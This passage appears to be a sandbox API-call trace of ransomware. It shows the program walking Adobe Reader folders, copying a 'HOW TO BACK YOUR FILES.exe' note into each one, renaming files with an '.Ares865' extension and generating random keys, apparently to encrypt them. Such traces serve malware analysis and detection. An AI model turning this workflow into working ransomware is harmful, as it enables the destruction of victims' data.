CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\how to back your files.exe"), bFailIfExists=1) returned 0 [0155.770] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0155.770] GetLastError () returned 0x0 [0155.770] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0155.770] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x544125a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x544125a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0155.771] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.771] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0155.771] lstrcpyW (in: lpString1=0x2cce47c, lpString2="LanguageNames2" | out: lpString1="LanguageNames2") returned="LanguageNames2" [0155.771] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7968 [0155.771] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x9a) returned 0x320fc8 [0155.771] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7970 | out: ListHead=0x2e7710, ListEntry=0x2e7970) returned 0x2e7950 [0155.771] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x544125a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x544125a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Providers", cAlternateFileName="PROVID~1")) returned 1 [0155.771] lstrcmpiW (lpString1="Providers", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0155.771] lstrcmpiW (lpString1="Providers", lpString2="aoldtz.exe") returned 1 [0155.771] lstrcpyW (in: lpString1=0x2cce47c, lpString2="Providers" | out: lpString1="Providers") returned="Providers" [0155.771] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0155.771] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x90) returned 0x336fc8 [0155.771] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0155.771] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x544125a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x544125a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Providers", cAlternateFileName="PROVID~1")) returned 0 [0155.771] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0155.771] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7990 [0155.772] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers" [0155.772] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers" [0155.772] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0155.772] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\how to back your files.exe"), bFailIfExists=1) returned 0 [0155.773] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0155.773] GetLastError () returned 0x0 [0155.773] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0155.773] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x544125a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x544125a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0155.774] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.774] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0155.774] lstrcpyW (in: lpString1=0x2cce490, lpString2="Proximity" | out: lpString1="Proximity") returned="Proximity" [0155.774] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0155.774] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa4) returned 0x2f2fc8 [0155.774] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0155.774] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x544125a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x544125a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Proximity", cAlternateFileName="PROXIM~1")) returned 0 [0155.774] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0155.774] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7990 [0155.774] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity" [0155.774] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity" [0155.775] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0155.775] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\how to back your files.exe"), bFailIfExists=1) returned 0 [0155.775] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0155.776] GetLastError () returned 0x0 [0155.776] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0155.776] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x544125a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x544125a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0155.776] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.776] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0155.776] lstrcpyW (in: lpString1=0x2cce4a4, lpString2="11.00" | out: lpString1="11.00") returned="11.00" [0155.777] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7988 [0155.777] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb0) returned 0x2e8890 [0155.777] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7990 | out: ListHead=0x2e7710, ListEntry=0x2e7990) returned 0x2e7970 [0155.777] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x544125a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x544125a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0155.777] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0155.777] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x544125a0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x544125a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0155.777] FindClose (in: hFindFile=0x2ccee8 | out: hFindFile=0x2ccee8) returned 1 [0155.777] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7990 [0155.777] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00" [0155.777] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00" [0155.777] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0155.777] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\how to back your files.exe"), bFailIfExists=1) returned 0 [0155.778] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0155.778] GetLastError () returned 0x0 [0155.779] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0155.779] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7cfb2f60, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x5458f360, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5458f360, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0155.779] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.779] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0155.779] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="ara131.lex" | out: lpString1="ara131.lex") returned="ara131.lex" [0155.779] lstrlenW (lpString="ara131.lex") returned 10 [0155.779] lstrlenW (lpString="Ares865") returned 7 [0155.779] lstrcmpiW (lpString1="131.lex", lpString2="Ares865") returned -1 [0155.780] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ara131.lex.Ares865") returned 106 [0155.780] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ara131.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ara131.lex"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ara131.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ara131.lex.ares865"), dwFlags=0x1) returned 1 [0155.782] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ara131.lex.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ara131.lex.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.782] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2111488) returned 1 [0155.782] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0155.783] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.783] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.911] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0155.911] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.911] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.922] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="ara32.clx" | out: lpString1="ara32.clx") returned="ara32.clx" [0155.922] lstrlenW (lpString="ara32.clx") returned 9 [0155.922] lstrlenW (lpString="Ares865") returned 7 [0155.922] lstrcmpiW (lpString1="a32.clx", lpString2="Ares865") returned -1 [0155.923] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ara32.clx.Ares865") returned 105 [0155.923] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ara32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ara32.clx"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ara32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ara32.clx.ares865"), dwFlags=0x1) returned 1 [0155.926] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\ara32.clx.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\ara32.clx.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.926] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=32756) returned 1 [0155.927] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0155.927] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.927] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.931] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0155.932] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.932] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.933] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="araphon.env.Ares865" | out: lpString1="araphon.env.Ares865") returned="araphon.env.Ares865" [0155.933] lstrlenW (lpString="araphon.env.Ares865") returned 19 [0155.933] lstrlenW (lpString="Ares865") returned 7 [0155.933] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0155.933] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x93de7300, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x7df2be60, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x93de7300, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x128c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="brt.fca", cAlternateFileName="")) returned 1 [0155.933] lstrcmpiW (lpString1="brt.fca", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0155.933] lstrcmpiW (lpString1="brt.fca", lpString2="aoldtz.exe") returned 1 [0155.933] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="brt.fca" | out: lpString1="brt.fca") returned="brt.fca" [0155.933] lstrlenW (lpString="brt.fca") returned 7 [0155.933] lstrlenW (lpString="Ares865") returned 7 [0155.934] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt.fca.Ares865") returned 103 [0155.934] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt.fca"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt.fca.ares865"), dwFlags=0x1) returned 1 [0155.939] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt.fca.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt.fca.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.939] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4748) returned 1 [0155.939] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0155.940] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.940] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.943] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0155.943] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.943] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.944] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="brt.hyp" | out: lpString1="brt.hyp") returned="brt.hyp" [0155.944] lstrlenW (lpString="brt.hyp") returned 7 [0155.944] lstrlenW (lpString="Ares865") returned 7 [0155.944] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt.hyp.Ares865") returned 103 [0155.944] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt.hyp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt.hyp.ares865"), dwFlags=0x1) returned 1 [0155.946] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt.hyp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt.hyp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0155.946] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=51200) returned 1 [0155.947] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0155.947] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0155.947] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.970] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0155.971] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0155.971] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0155.972] lstrcpyW (in: lpString1=0x2cce4b0, lpString2="brt04.hsp" | out: lpString1="brt04.hsp") returned="brt04.hsp" [0155.972] lstrlenW (lpString="brt04.hsp") returned 9 [0155.972] lstrlenW (lpString="Ares865") returned 7 [0155.972] lstrcmpiW (lpString1="t04.hsp", lpString2="Ares865") returned 1 [0155.973] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt04.hsp.Ares865") returned 105 [0155.973] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt04.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt04.hsp"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt04.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt04.hsp.ares865"), dwFlags=0x1) returned 1 [0155.979] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\brt04.hsp.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\brt04.hsp.ares865"), 